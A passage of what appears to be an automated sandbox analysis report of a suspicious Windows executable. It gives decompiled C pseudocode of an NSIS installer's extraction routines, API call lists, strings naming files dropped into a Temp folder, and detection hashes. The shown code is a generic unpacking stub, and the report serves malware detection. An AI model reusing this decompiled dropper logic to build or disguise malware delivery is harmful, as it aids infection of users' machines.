						_t103 = _v24;
						__eflags = _t103 - _t117;
						 *0x423f2c = _t112;
						if(_t103 > _t117) {
							goto L36;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L15:
							_v16 = _v16 + 1;
							_t25 = _t103 - 4; // 0x1c
							_t117 = _t25;
							__eflags = _t114 - _t117;
							if(_t114 > _t117) {
								_t114 = _t117;
							}
							goto L22;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L15;
						L22:
						__eflags = _t117 -  *0x41f0e0;
						if(_t117 <  *0x41f0e0) {
							_v12 = E00405E46(_v12, 0x4170e0, _t114);
						}
						 *0x4170d0 =  *0x4170d0 + _t114;
						_t117 = _t117 - _t114;
						__eflags = _t117;
					} while (_t117 > 0);
					__eflags = _v8;
					if(_v8 != 0) {
						DestroyWindow(_v8);
					}
					goto L27;
				}
			}




































                0x00402c8b
                0x00402ca5
                0x00402ca8
                0x00402cab
                0x00402cae
                0x00402cc1
                0x00402cc6
                0x00402ccc
                0x00000000
                0x00402cce
                0x00402cdf
                0x00402cf0
                0x00402cf7
                0x00402cfd
                0x00402cff
                0x00402d04
                0x00402d06
                0x00402e45
                0x00402e45
                0x00402e4b
                0x00000000
                0x00000000
                0x00402e51
                0x00402e54
                0x00402e80
                0x00402e85
                0x00402e90
                0x00402e92
                0x00402ea3
                0x00402ebe
                0x00402ec4
                0x00402ec7
                0x00402ecc
                0x00402ee8
                0x00402ef1
                0x00402f01
                0x00402f13
                0x00402f18
                0x00402f1d
                0x00402f20
                0x00402f29
                0x00402f2d
                0x00402f35
                0x00402f3a
                0x00402f3c
                0x00402f3c
                0x00402f3c
                0x00402f44
                0x00402f44
                0x00402f47
                0x00402f48
                0x00402f48
                0x00402f4b
                0x00402f4d
                0x00402f4d
                0x00402f4d
                0x00402f50
                0x00402f57
                0x00402f63
                0x00402f68
                0x00000000
                0x00402f68
                0x00000000
                0x00402f20
                0x00000000
                0x00402ece
                0x00402e5c
                0x00402e67
                0x00402e6c
                0x00402e6e
                0x00000000
                0x00000000
                0x00402e77
                0x00402e7a
                0x00000000
                0x00000000
                0x00000000
                0x00402d0c
                0x00402d0c
                0x00402d0c
                0x00402d11
                0x00402d15
                0x00402d1c
                0x00402d21
                0x00402d23
                0x00402d25
                0x00402d25
                0x00402d2d
                0x00402d32
                0x00402d34
                0x00402ed8
                0x00402edb
                0x00402ee0
                0x00402ee0
                0x00402f22
                0x00000000
                0x00402f22
                0x00402d3a
                0x00402d40
                0x00402dd4
                0x00402dd8
                0x00402dda
                0x00402ddd
                0x00402de7
                0x00402ded
                0x00402df0
                0x00402e0b
                0x00402e0b
                0x00402ddf
                0x00402de0
                0x00402de0
                0x00402ddd
                0x00000000
                0x00402dd8
                0x00402d51
                0x00402d56
                0x00402d59
                0x00402d5e
                0x00000000
                0x00000000
                0x00402d64
                0x00402d6b
                0x00000000
                0x00000000
                0x00402d71
                0x00402d78
                0x00000000
                0x00000000
                0x00402d7e
                0x00402d85
                0x00000000
                0x00000000
                0x00402d8b
                0x00402d92
                0x00000000
                0x00000000
                0x00402d94
                0x00402d9a
                0x00402da3
                0x00402da9
                0x00402dac
                0x00402dae
                0x00402db4
                0x00000000
                0x00000000
                0x00402dba
                0x00402dbe
                0x00402dc6
                0x00402dc6
                0x00402dc9
                0x00402dc9
                0x00402dcc
                0x00402dce
                0x00402dd0
                0x00402dd0
                0x00000000
                0x00402dce
                0x00402dc0
                0x00402dc4
                0x00000000
                0x00000000
                0x00000000
                0x00402e0e
                0x00402e0e
                0x00402e14
                0x00402e24
                0x00402e24
                0x00402e27
                0x00402e2d
                0x00402e2f
                0x00402e2f
                0x00402e37
                0x00402e3a
                0x00402e3f
                0x00402e3f
                0x00000000
                0x00402e3a

                APIs
                • GetTickCount.KERNEL32 ref: 00402C8E
                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\O1ySvN9SvL.exe,00000400), ref: 00402CAE
                  • Part of subcall function 004057CB: GetFileAttributesA.KERNELBASE(00000003,00402CC1,C:\Users\user\Desktop\O1ySvN9SvL.exe,80000000,00000003), ref: 004057CF
                  • Part of subcall function 004057CB: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004057F1
                • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\O1ySvN9SvL.exe,C:\Users\user\Desktop\O1ySvN9SvL.exe,80000000,00000003), ref: 00402CF7
                • DestroyWindow.USER32(?,004170E0,00000000), ref: 00402E3F
                • GlobalAlloc.KERNELBASE(00000040,?), ref: 00402E85
                Strings
                • The installer you are trying to use is corrupted or incomplete.This could be the result of a damaged disk, a failed download or a virus.You may want to contact the author of this installer to obtain a new copy.It may be possible to skip this check using t, xrefs: 00402F22
                • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402ECE
                • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C7D, 00402E9D
                • "C:\Users\user\Desktop\O1ySvN9SvL.exe" , xrefs: 00402C8A
                • C:\Users\user\Desktop, xrefs: 00402CD9, 00402CDE, 00402CE4
                • Inst, xrefs: 00402D71
                • C:\Users\user\Desktop\O1ySvN9SvL.exe, xrefs: 00402C94, 00402CA3, 00402CBB, 00402CD8
                • soft, xrefs: 00402D7E
                • verifying installer: %d%%, xrefs: 00402DF2
                • Error launching installer, xrefs: 00402CCE
                • Null, xrefs: 00402D8B
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: File$AllocAttributesCountCreateDestroyGlobalModuleNameSizeTickWindow
                • String ID: "C:\Users\user\Desktop\O1ySvN9SvL.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\O1ySvN9SvL.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Null$The installer you are trying to use is corrupted or incomplete.This could be the result of a damaged disk, a failed download or a virus.You may want to contact the author of this installer to obtain a new copy.It may be possible to skip this check using t$soft$verifying installer: %d%%
                • API String ID: 2181728824-3106390566
                • Opcode ID: fa3c77b8c9c104c16c323750b5209556a5f99b4d0684dab4212019c86abb6d92
                • Instruction ID: db3d77af3dcc15e42867082d874dfbf8a96a36a76704b09f65ca819f11d0ff47
                • Opcode Fuzzy Hash: fa3c77b8c9c104c16c323750b5209556a5f99b4d0684dab4212019c86abb6d92
                • Instruction Fuzzy Hash: DB81B031E40205ABDB20DFA4DE89A9E7AB4EB08355F14813BF505B62D1C7BC9E41CB9C
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040309C Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 137filewindowCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 415 40309c-4030c8 GetTickCount 416 403272 415->416 417 4030ce-4030f3 call 4032af SetFilePointer 415->417 418 403274-40327a 416->418 421 4030f9-40310b 417->421 422 40310d 421->422 423 40310f-40311d call 40327d 421->423 422->423 426 403123-40312f 423->426 427 40323d-403240 423->427 428 403135-40313b 426->428 427->418 429 4031a0-4031c0 call 405ed4 428->429 430 40313d-403143 428->430 436 403246 429->436 437 4031c6-4031d3 429->437 430->429 431 403145-403149 430->431 433 40314b-40316b call 405e13 431->433 434 40316d-403175 GetTickCount 431->434 433->429 434->429 439 403177-40319c CreateDialogParamA 434->439 443 403248-403249 436->443 440 4031d5-4031eb WriteFile 437->440 441 403207-40320d 437->441 439->429 444 403242-403244 440->444 445 4031ed-4031f1 440->445 441->436 446 40320f-403211 441->446 443->418 444->443 445->444 447 4031f3-4031ff 445->447 446->436 448 403213-403226 446->448 447->428 449 403205 447->449 448->421 450 40322c-40323b SetFilePointer 448->450 449->448 451 40324b-403251 450->451 451->416 452 403253-40326c SendMessageA DestroyWindow 451->452 452->416
                C-Code - Quality: 93%
                			E0040309C(intOrPtr _a4) {
				long _v4;
				int _v8;
				struct HWND__* _v12;
				void* __ecx;
				long _t10;
				intOrPtr _t14;
				long _t15;
				signed int _t16;
				void* _t18;
				void* _t19;
				long _t21;
				int _t26;
				long _t27;
				signed int _t28;
				long _t31;
				long _t38;
				void* _t45;
				long _t46;
				intOrPtr _t48;
				void* _t50;
				long _t51;
				struct HWND__* _t52;
				intOrPtr _t58;
				intOrPtr _t59;
				long _t65;

				_v8 = 0;
				_t10 = GetTickCount();
				_t46 =  *0x4170d4; // 0x604ca
				_t45 = _t10 + 0x1f4;
				_t48 = _t46 -  *0x40b004 + _a4;
				if(_t48 <= 0) {
					L28:
					return 0;
				} else {
					E004032AF( *0x41f0e4);
					SetFilePointer( *0x409024,  *0x40b004, 0, 0); // executed
					 *0x41f0e0 = _t48;
					 *0x4170d0 = 0;
					do {
						_t14 =  *0x4170d8; // 0x4904e
						_t38 = 0x4000;
						_t15 = _t14 -  *0x41f0e4;
						if(_t15 <= 0x4000) {
							_t38 = _t15;
						}
						_t16 = E0040327D(0x413090, _t38); // executed
						if(_t16 == 0) {
							return _t16 | 0xffffffff;
						}
						 *0x41f0e4 =  *0x41f0e4 + _t38;
						 *0x40b020 = 0x413090;
						 *0x40b024 = _t38;
						while(1) {
							_t58 =  *0x423f28; // 0x74d188
							if(_t58 != 0) {
								_t59 =  *0x423fc0; // 0x0
								if(_t59 == 0) {
									if(_v8 == 0) {
										_t27 = GetTickCount();
										__eflags = _t27 - _t45;
										if(_t27 > _t45) {
											_t28 =  *0x423f24; // 0x0
											asm("sbb eax, eax");
											_t31 =  !( ~_t28) & "unpacking data: %d%%";
											__eflags = _t31;
											_v12 = CreateDialogParamA( *0x423f20, 0x6f, 0, E00402BCA, _t31);
										}
									} else {
										 *0x4170d0 =  *0x41f0e0 -  *0x4170d4 - _a4 +  *0x40b004;
										E00405E13(0);
									}
								}
							}
							 *0x40b028 = 0x40b090;
							 *0x40b02c = 0x8000; // executed
							_t18 = E00405ED4(0x40b008); // executed
							if(_t18 < 0) {
								break;
							}
							_t50 =  *0x40b028; // 0x40cb4a
							_t51 = _t50 - 0x40b090;
							if(_t51 == 0) {
								__eflags =  *0x40b024; // 0x0
								if(__eflags != 0) {
									break;
								}
								__eflags = _t38;
								if(_t38 == 0) {
									break;
								}
								goto L20;
							}
							_t26 = WriteFile( *0x409024, 0x40b090, _t51,  &_v4, 0); // executed
							if(_t26 == 0 || _t51 != _v4) {
								_push(0xfffffffe);
								L25:
								_pop(_t19);
								return _t19;
							} else {
								 *0x40b004 =  *0x40b004 + _t51;
								_t65 =  *0x40b024; // 0x0
								if(_t65 != 0) {
									continue;
								}
								goto L20;
							}
						}
						_push(0xfffffffd);
						goto L25;
						L20:
						_t21 =  *0x4170d4; // 0x604ca
					} while (_t21 -  *0x40b004 + _a4 > 0);
					SetFilePointer( *0x409024, _t21, 0, 0); // executed
					_t52 = _v8;
					if(_t52 != 0) {
						 *0x4170d0 =  *0x41f0e0;
						SendMessageA(_t52, 0x113, 0, 0);
						DestroyWindow(_t52);
					}
					goto L28;
				}
			}




























                0x004030a4
                0x004030a8
                0x004030ae
                0x004030bc
                0x004030c2
                0x004030c8
                0x00403272
                0x00000000
                0x004030ce
                0x004030d4
                0x004030e7
                0x004030ed
                0x004030f3
                0x004030f9
                0x004030f9
                0x004030fe
                0x00403103
                0x0040310b
                0x0040310d
                0x0040310d
                0x00403116
                0x0040311d
                0x00000000
                0x0040323d
                0x00403123
                0x00403129
                0x0040312f
                0x00403135
                0x00403135
                0x0040313b
                0x0040313d
                0x00403143
                0x00403149
                0x0040316d
                0x00403173
                0x00403175
                0x00403177
                0x0040317e
                0x00403182
                0x00403182
                0x0040319c
                0x0040319c
                0x0040314b
                0x00403161
                0x00403166
                0x00403166
                0x00403149
                0x00403143
                0x004031a5
                0x004031af
                0x004031b9
                0x004031c0
                0x00000000
                0x00000000
                0x004031c6
                0x004031d1
                0x004031d3
                0x00403207
                0x0040320d
                0x00000000
                0x00000000
                0x0040320f
                0x00403211
                0x00000000
                0x00000000
                0x00000000
                0x00403211
                0x004031e3
                0x004031eb
                0x00403242
                0x00403248
                0x00403248
                0x00000000
                0x004031f3
                0x004031f3
                0x004031f9
                0x004031ff
                0x00000000
                0x00000000
                0x00000000
                0x00403205
                0x004031eb
                0x00403246
                0x00000000
                0x00403213
                0x00403213
                0x00403224
                0x00403235
                0x0040324b
                0x00403251
                0x00403260
                0x00403265
                0x0040326c
                0x0040326c
                0x00000000
                0x00403251

                APIs
                • GetTickCount.KERNEL32 ref: 004030A8
                  • Part of subcall function 004032AF: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EF6,00007DE4), ref: 004032BD
                • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,00000020,00000020,00402FA7,00000004,00000000,00000000,00000000,00000020,00000020,?,00402F1D,000000FF), ref: 004030E7
                • GetTickCount.KERNEL32 ref: 0040316D
                • CreateDialogParamA.USER32(0000006F,00000000,00402BCA,00000000), ref: 00403196
                • WriteFile.KERNELBASE(0040B090,0040CB4A,000000FF,00000000,tCPInfo,00004000,?,00000000,00000020,00000020,00402FA7,00000004,00000000,00000000,00000000,00000020), ref: 004031E3
                • SetFilePointer.KERNELBASE(000604CA,00000000,00000000,tCPInfo,00004000,?,00000000,00000020,00000020,00402FA7,00000004,00000000,00000000,00000000,00000020,00000020), ref: 00403235
                • SendMessageA.USER32 ref: 00403265
                • DestroyWindow.USER32(00000000,?,00000000,00000020,00000020,00402FA7,00000004,00000000,00000000,00000000,00000020,00000020,?,00402F1D,000000FF,00000000), ref: 0040326C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: File$Pointer$CountTick$CreateDestroyDialogMessageParamSendWindowWrite
                • String ID: tCPInfo
                • API String ID: 131999699-2120998202
                • Opcode ID: 42578b057d0362633f9efa20e3f5837a8032a4944e8e1f2b1687a923ed4c40b4
                • Instruction ID: 533e5dba32bddeac04eb0af6ed3ed2a018518d1e6048d9abc72f3d394191c675
                • Opcode Fuzzy Hash: 42578b057d0362633f9efa20e3f5837a8032a4944e8e1f2b1687a923ed4c40b4
                • Instruction Fuzzy Hash: 3C418B71A043049BD710DF65EE4496B3FBCF709356B11827EF611B22E1C739AA048BAD
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040177F Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 147stringtimeCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 453 40177f-4017a2 call 402a85 call 405654 458 4017a4-4017aa call 405af4 453->458 459 4017ac-4017be call 405af4 call 4055e7 lstrcatA 453->459 464 4017c3-4017c9 call 405d03 458->464 459->464 469 4017ce-4017d2 464->469 470 4017d4-4017de call 405d9c 469->470 471 401805-401808 469->471 479 4017f0-401802 470->479 480 4017e0-4017ee CompareFileTime 470->480 472 401810-40182c call 4057cb 471->472 473 40180a-40180b call 4057ac 471->473 481 4018a4-4018cd call 404e9f call 402f71 472->481 482 40182e-401831 472->482 473->472 479->471 480->479 496 4018d5-4018e1 SetFileTime 481->496 497 4018cf-4018d3 481->497 483 401833-401875 call 405af4 * 2 call 405b16 call 405af4 call 4053c2 482->483 484 401886-401890 call 404e9f 482->484 483->469 516 40187b-40187c 483->516 494 401899-40189f 484->494 499 402923 494->499 498 4018e7-4018f2 FindCloseChangeNotification 496->498 497->496 497->498 501 4018f8-4018fb 498->501 502 40291a-40291d 498->502 503 402925-402929 499->503 505 401910-401913 call 405b16 501->505 506 4018fd-40190e call 405b16 lstrcatA 501->506 502->499 513 401918-402276 call 4053c2 505->513 506->513 513->503 520 4026bf-4026c6 513->520 516->494 518 40187e-40187f 516->518 518->484 520->502
                C-Code - Quality: 70%
                			E0040177F(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				CHAR* _t81;
				void* _t83;
				void* _t85;

				_t75 = __ebx;
				_t81 = E00402A85(0x31);
				 *(_t85 - 0x3c) = _t81;
				 *(_t85 + 8) =  *(_t85 - 0x24) & 0x00000007;
				_t33 = E00405654(_t81);
				_push(_t81);
				if(_t33 == 0) {
					lstrcatA(E004055E7(E00405AF4(0x4093f8, "C:\\Users\\alfons\\AppData\\Local\\Temp")), ??);
				} else {
					_push(0x4093f8);
					E00405AF4();
				}
				E00405D03(0x4093f8);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E00405D9C(0x4093f8);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x18);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E004057AC(0x4093f8);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E004057CB(0x4093f8, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 8) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00404E9F(0xffffffe2,  *(_t85 - 0x3c));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x423fa8 =  *0x423fa8 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x423fa8;
						goto L32;
					} else {
						E00405AF4(0x409bf8, 0x424000);
						E00405AF4(0x424000, 0x4093f8);
						E00405B16(_t75, 0x4093f8, 0x409bf8, "C:\Users\alfons\AppData\Local\Temp",  *((intOrPtr*)(_t85 - 0x10)));
						E00405AF4(0x424000, 0x409bf8);
						_t62 = E004053C2("C:\Users\alfons\AppData\Local\Temp",  *(_t85 - 0x24) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x423fa8 =  &( *0x423fa8->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x4093f8);
								_push(0xfffffffa);
								E00404E9F();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404E9F(0xffffffea,  *(_t85 - 0x3c));
				 *0x409250 =  *0x409250 + 1;
				_t43 = E00402F71(_t77,  *((intOrPtr*)(_t85 - 0x1c)),  *(_t85 - 8), _t75, _t75); // executed
				 *0x409250 =  *0x409250 - 1;
				__eflags =  *(_t85 - 0x18) - 0xffffffff;
				_t83 = _t43;
				if( *(_t85 - 0x18) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 8), _t85 - 0x18, _t75, _t85 - 0x18); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x14)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x14)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 8)); // executed
				__eflags = _t83 - _t75;
				if(_t83 >= _t75) {
					goto L31;
				} else {
					__eflags = _t83 - 0xfffffffe;
					if(_t83 != 0xfffffffe) {
						E00405B16(_t75, 0x4093f8, _t83, 0x4093f8, 0xffffffee);
					} else {
						E00405B16(_t75, 0x4093f8, _t83, 0x4093f8, 0xffffffe9);
						lstrcatA(0x4093f8,  *(_t85 - 0x3c));
					}
					_push(0x200010);
					_push(0x4093f8);
					E004053C2();
					goto L29;
				}
				goto L33;
			}
















                0x0040177f
                0x00401786
                0x0040178f
                0x00401792
                0x00401795
                0x004017a1
                0x004017a2
                0x004017be
                0x004017a4
                0x004017a4
                0x004017a5
                0x004017a5
                0x004017c4
                0x004017ce
                0x004017ce
                0x004017d2
                0x004017d5
                0x004017da
                0x004017dc
                0x004017de
                0x004017e3
                0x004017e3
                0x004017ee
                0x004017ee
                0x004017ff
                0x00401801
                0x00401801
                0x00401802
                0x00401802
                0x00401805
                0x00401808
                0x0040180b
                0x0040180b
                0x00401812
                0x00401821
                0x00401826
                0x00401829
                0x0040182c
                0x00000000
                0x00000000
                0x0040182e
                0x00401831
                0x0040188b
                0x00401890
                0x004015b0
                0x004026bf
                0x004026bf
                0x0040291a
                0x0040291d
                0x0040291d
                0x00000000
                0x00401833
                0x00401839
                0x00401844
                0x00401851
                0x0040185c
                0x00401872
                0x00401872
                0x00401875
                0x00000000
                0x0040187b
                0x0040187b
                0x0040187c
                0x00401899
                0x00402923
                0x00402923
                0x00402923
                0x0040187e
                0x0040187e
                0x0040187f
                0x00401492
                0x00402271
                0x00402271
                0x00402271
                0x0040187c
                0x00401875
                0x00402925
                0x00402929
                0x00402929
                0x004018a9
                0x004018ae
                0x004018bc
                0x004018c1
                0x004018c7
                0x004018cb
                0x004018cd
                0x004018d5
                0x004018e1
                0x004018cf
                0x004018cf
                0x004018d3
                0x00000000
                0x00000000
                0x004018d3
                0x004018ea
                0x004018f0
                0x004018f2
                0x00000000
                0x004018f8
                0x004018f8
                0x004018fb
                0x00401913
                0x004018fd
                0x00401900
                0x00401909
                0x00401909
                0x00401918
                0x0040191d
                0x0040226c
                0x00000000
                0x0040226c
                0x00000000

                APIs
                • lstrcatA.KERNEL32(00000000,00000000,C:\Users\user\AppData\Local\Temp\zrztlh.exe C:\Users\user\AppData\Local\Temp\kplemx,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017BE
                • CompareFileTime.KERNEL32(-00000014,?,C:\Users\user\AppData\Local\Temp\zrztlh.exe C:\Users\user\AppData\Local\Temp\kplemx,C:\Users\user\AppData\Local\Temp\zrztlh.exe C:\Users\user\AppData\Local\Temp\kplemx,00000000,00000000,C:\Users\user\AppData\Local\Temp\zrztlh.exe C:\Users\user\AppData\Local\Temp\kplemx,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017E8
                  • Part of subcall function 00405AF4: lstrcpynA.KERNEL32(?,?,00000400,00403351,xwkwrbeiqiuu Setup,NSIS Error), ref: 00405B01
                  • Part of subcall function 00404E9F: lstrlenA.KERNEL32(0041FD08,?,00000000,?,?,?,?,?,?,?,?,?,?,?,004055E1,000000E5), ref: 00404ED8
                  • Part of subcall function 00404E9F: lstrlenA.KERNEL32(?,0041FD08,?,00000000,?,?,?,?,?,?,?,?,?,?,?,004055E1), ref: 00404EE8
                  • Part of subcall function 00404E9F: lstrcatA.KERNEL32(0041FD08,?,?,0041FD08,?,00000000,?), ref: 00404EFB
                  • Part of subcall function 00404E9F: SetWindowTextA.USER32(0041FD08,0041FD08), ref: 00404F0D
                  • Part of subcall function 00404E9F: SendMessageA.USER32 ref: 00404F33
                  • Part of subcall function 00404E9F: SendMessageA.USER32 ref: 00404F4D
                  • Part of subcall function 00404E9F: SendMessageA.USER32 ref: 00404F5B
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\zrztlh.exe C:\Users\user\AppData\Local\Temp\kplemx
                • API String ID: 1941528284-3240300064
                • Opcode ID: b97167aada2fa4578f9a117d5a902ee8dbf52284c50a83dde4a4e1865d353282
                • Instruction ID: c1706ba1e04a40909550e17ecf840e167a7961d0d42511267d0e2aa6186e8961
                • Opcode Fuzzy Hash: b97167aada2fa4578f9a117d5a902ee8dbf52284c50a83dde4a4e1865d353282
                • Instruction Fuzzy Hash: 1941D331A10104BACB11BFA5DC85EBF3678EB85368B20423FF521F10E2CA7C49419B6D
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00402F71 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 109fileCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 521 402f71-402f80 522 402f82-402f98 SetFilePointer 521->522 523 402f9e-402fa9 call 40309c 521->523 522->523 526 403095-403099 523->526 527 402faf-402fc9 ReadFile 523->527 528 403092 527->528 529 402fcf-402fd2 527->529 531 403094 528->531 529->528 530 402fd8-402feb call 40309c 529->530 530->526 534 402ff1-402ff4 530->534 531->526 535 403061-403067 534->535 536 402ff6-402ff9 534->536 537 403069 535->537 538 40306c-40307f ReadFile 535->538 539 40308d-403090 536->539 540 402fff 536->540 537->538 538->528 541 403081-40308a 538->541 539->526 542 403004-40300c 540->542 541->539 543 403011-403023 ReadFile 542->543 544 40300e 542->544 543->528 545 403025-403028 543->545 544->543 545->528 546 40302a-40303f WriteFile 545->546 547 403041-403044 546->547 548 40305d-40305f 546->548 547->548 549 403046-403059 547->549 548->531 549->542 550 40305b 549->550 550->539
                C-Code - Quality: 93%
                			E00402F71(void* __ecx, void _a4, void* _a8, void* _a12, long _a16) {
				long _v8;
				intOrPtr _v12;
				void _t31;
				intOrPtr _t32;
				int _t35;
				long _t36;
				int _t37;
				long _t38;
				int _t40;
				int _t42;
				long _t43;
				long _t44;
				intOrPtr _t51;
				long _t55;
				long _t57;

				_t31 = _a4;
				if(_t31 >= 0) {
					_t51 =  *0x423f78; // 0x21f4
					_t44 = _t31 + _t51;
					 *0x4170d4 = _t44;
					SetFilePointer( *0x409024, _t44, 0, 0); // executed
				}
				_t57 = 4;
				_t32 = E0040309C(_t57);
				if(_t32 >= 0) {
					_t35 = ReadFile( *0x409024,  &_a4, _t57,  &_v8, 0); // executed
					if(_t35 == 0 || _v8 != _t57) {
						L23:
						_push(0xfffffffd);
						goto L24;
					} else {
						 *0x4170d4 =  *0x4170d4 + _t57;
						_t32 = E0040309C(_a4);
						_v12 = _t32;
						if(_t32 >= 0) {
							if(_a12 != 0) {
								_t36 = _a4;
								if(_t36 >= _a16) {
									_t36 = _a16;
								}
								_t37 = ReadFile( *0x409024, _a12, _t36,  &_v8, 0); // executed
								if(_t37 == 0) {
									goto L23;
								} else {
									_t38 = _v8;
									 *0x4170d4 =  *0x4170d4 + _t38;
									_v12 = _t38;
									goto L22;
								}
							} else {
								if(_a4 <= 0) {
									L22:
									_t32 = _v12;
								} else {
									while(1) {
										_t55 = 0x4000;
										if(_a4 < 0x4000) {
											_t55 = _a4;
										}
										_t40 = ReadFile( *0x409024, 0x413090, _t55,  &_v8, 0); // executed
										if(_t40 == 0 || _t55 != _v8) {
											goto L23;
										}
										_t42 = WriteFile(_a8, 0x413090, _v8,  &_a16, 0); // executed
										if(_t42 == 0 || _a16 != _t55) {
											_push(0xfffffffe);
											L24:
											_pop(_t32);
										} else {
											_t43 = _v8;
											_v12 = _v12 + _t43;
											_a4 = _a4 - _t43;
											 *0x4170d4 =  *0x4170d4 + _t43;
